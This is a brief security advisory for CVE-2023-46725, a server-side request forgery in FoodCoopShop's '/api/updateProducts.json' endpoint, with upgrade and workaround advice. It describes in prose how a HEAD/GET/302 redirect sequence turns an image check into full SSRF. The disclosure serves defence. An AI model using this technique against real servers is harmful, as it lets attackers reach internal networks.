CVE-2023-46725

Name of the Vulnerable Software and Affected Versions FoodCoopShop versions prior to 3.6.1

Description The issue is related to server-side request forgery. In the Network module, a manufacturer account can use the "/api/updateProducts.json" endpoint to make the server send a request to an arbitrary host, allowing the server to be used as a proxy into the internal network. Additionally, there is a time of check time of use issue due to inadequate checks on valid images. This can be exploited by using a custom server that returns 200 on HEAD requests, then returns a valid image on the first GET request, and then a 302 redirect to the final target on the second GET request, making it a full SSRF.

Recommendations For versions prior to 3.6.1, update to version 3.6.1 to fix the vulnerability. As a temporary workaround, consider restricting access to the "/api/updateProducts.json" endpoint in the Network module to minimize the risk of exploitation. Avoid using the data[data][0][image] parameter in the affected API endpoint until the issue is resolved.